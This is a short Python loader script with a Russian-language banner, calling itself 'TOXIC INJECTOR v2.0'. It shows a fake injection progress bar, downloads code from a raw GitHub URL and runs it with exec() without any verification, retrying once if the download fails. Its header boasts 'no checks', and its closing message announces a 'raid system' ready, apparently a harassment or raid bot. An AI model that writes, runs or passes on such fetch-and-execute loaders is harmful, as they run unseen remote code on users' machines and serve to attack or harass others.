# ZENNIX TOX INJECTOR — КРАСИВЫЙ, ЧИСТЫЙ, БЕЗ ПРОВЕРОК
import requests, sys, time, os

def clear(): os.system("cls" if os.name=="nt" else "clear")
def t(text, d=0.04):
    for c in text: print(c, end="", flush=True); time.sleep(d)
    print()

clear()
print("\033[95m" + r"""
 ███████╗███████╗███╗   ██╗███╗   ██╗██╗██╗  ██╗
 ╚══███╔╝██╔════╝████╗  ██║████╗  ██║██║╚██╗██╔╝
   ███╔╝ █████╗  ██╔██╗ ██║██╔██╗ ██║██║ ╚███╔╝ 
  ███╔╝  ██╔══╝  ██║╚██╗██║██║╚██╗██║██║ ██╔██╗ 
 ███████╗███████╗██║ ╚████║██║ ╚████║██║██╔╝ ██╗
 ╚══════╝╚══════╝╚═╝  ╚═══╝╚═╝  ╚═══╝╚═╝╚═╝  ╚═╝
           \033[91mTOXIC INJECTOR v2.0\033[0m
""")

t("   Инжект ядра...")

try:
    code = requests.get("https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/main", timeout=25).text
    
    print(f"   Ядро получено", end="")
    for _ in range(3):
        print(".", end="", flush=True)
        time.sleep(0.4)
    print("\n")
    
    for i in range(1, 11):
        print(f"\r   Инжект: [{'█'*i}{'░'*(10-i)}] {i*10}%", end="", flush=True)
        time.sleep(0.11)
    
    print("\n\033[92m   РЕЙД-СИСТЕМА ГОТОВА\033[0m")
    time.sleep(0.7)
    exec(code)

except:
    print("\033[91m\n   Ошибка связи. Повтор...\033[0m")
    time.sleep(2)
    # Повторная попытка
    try:
        code = requests.get("https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/main", timeout=25).text
        print("\033[92m   Ядро получено. Запуск...\033[0m")
        time.sleep(1)
        exec(code)
    except:
        print("\033[91m   Критическая ошибка. Проверь интернет или репозиторий.\033[0m")
        time.sleep(5)
